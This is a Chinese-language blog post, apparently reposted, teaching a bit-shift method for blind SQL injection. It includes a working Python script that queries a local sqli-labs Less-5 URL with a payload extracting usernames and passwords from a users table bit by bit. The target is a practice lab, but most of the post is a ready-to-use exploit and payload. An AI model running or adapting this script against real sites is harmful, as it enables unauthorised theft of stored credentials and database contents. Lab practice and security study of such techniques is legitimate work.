作者:许心怡917 | 来源:互联网 | 2023-10-13 09:06
如何提高sql盲注的效率和命中率一直是个值得研究的问题目前的主流方法有1.遍历2.二分法3.dns法4.使用位运算今天着重介绍位运算的方法首先学习两个位运算符号(右
如何提高sql盲注的效率和命中率一直是个值得研究的问题
目前的主流方法有
1.遍历
2.二分法
3.dns法
4.使用位运算
今天着重介绍位运算的方法
首先学习两个位运算符号<<(左移)>>(右移)
左移相当于乘2,右移相当于除以2
所以我们利用这个特性一个ascii码一个字节8位,我们循环8次就可以确定一个字符
例如:
s的ascii码值为115,换成2进制为 0111 0011
然后我们进行运算 0111 0011>>7=0
0111 0011>>6=01
......
也就是说每8次循环确定一个字符,非常高效快捷
import requests
def bitOperation(url):
result = "" # 存储获取的查询结果
url_bak = url
# 外层循环由查询结果字符的长度控制,内层循环即为固定的7次位运算
for len in range(1, 777): # 此处长度可控,也可以不做判断直接给一个很长的数字
str = ‘0‘ # 设置当前字符的ascii码二进制的第一位默认为0
for i in range(0, 7):
url = url.format(len, 6 - i, int(str + ‘0‘, 2)) # int(str + ‘0‘, 2)表示假设其第二位为0,若相等即条件为真,否则为假
r = requests.get(url)
# 以页面正常时的标识关键字作为区分,存在是为0,不存在是为1
if r.text.find("You are in") != -1:
str += ‘0‘
else:
str += ‘1‘
url = url_bak
# 二进制转换成十进制,也就是ascii码,再将ascii码转换成字符累加到result变量上
result += chr(int(str, 2))
print(result)
if int(str, 2) == 0: # 不再作判断长度, 当ascii码为00000000时自动退出(多发7个请求)
print("已超过此次查询字符串的长度,自动停止")
return result
if int(str, 2) == 127:
print("查询内容不存在或语法错误...")
return result
return result
url = "http://127.0.0.1/sqli-labs/Less-5/?id=1‘ and ascii(substr((select group_concat(concat_ws(0x7e,username,password)) from users),{},1))>>{}={}-- -"
bitOperation(url)
京公网安备 11010802041100号